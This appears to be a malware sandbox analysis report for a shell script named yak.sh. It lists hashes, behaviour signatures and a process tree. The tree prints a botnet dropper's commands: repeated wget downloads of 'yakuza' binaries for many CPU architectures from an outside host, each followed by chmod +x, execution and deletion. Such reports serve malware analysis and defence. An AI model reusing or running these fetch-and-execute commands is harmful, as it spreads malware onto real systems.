Analysis
-
max time kernel
5s -
max time network
35s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
yak.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
yak.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
yak.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
yak.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
yak.sh
-
Size
2KB
-
MD5
f50f60f970a5203dad27c480da7b4519
-
SHA1
f50f26900efe72f11c37767b5db9a3916a7c76b4
-
SHA256
ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
-
SHA512
40c118ed8e7b22ba4c439cc3de9a9d69d7cccd9b4d109b00a716ea564379e001304edaffb0f9ca143e87cb0138f566aebea2e998b76c9bb4b653cf7a191e4ddd
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 685 chmod 700 chmod 672 chmod 679 chmod 692 chmod 696 chmod 704 chmod 653 chmod 663 chmod -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 655 yakuza.mips 657 rm 659 wget 665 yakuza.mipsel 666 rm 644 wget
Processes
-
/tmp/yak.sh/tmp/yak.sh1⤵PID:642
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mips2⤵
- System Network Configuration Discovery
PID:644
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:653
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- System Network Configuration Discovery
PID:655
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:657
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:659
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:663
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:665
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:666
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.sh2⤵PID:669
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:672
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:673
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:674
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.x862⤵PID:676
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:681
-
-
/bin/rmrm -rf yakuza.x862⤵PID:682
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm62⤵PID:683
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:686
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:687
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i6862⤵PID:688
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:693
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:694
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.ppc2⤵PID:695
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:696
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:697
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:698
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.i5862⤵PID:699
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:701
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:702
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.m68k2⤵PID:703
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:704
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:705
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:706
-
-
/usr/bin/wgetwget http://linux-it.abuser.eu/yakuza.arm42⤵PID:707
-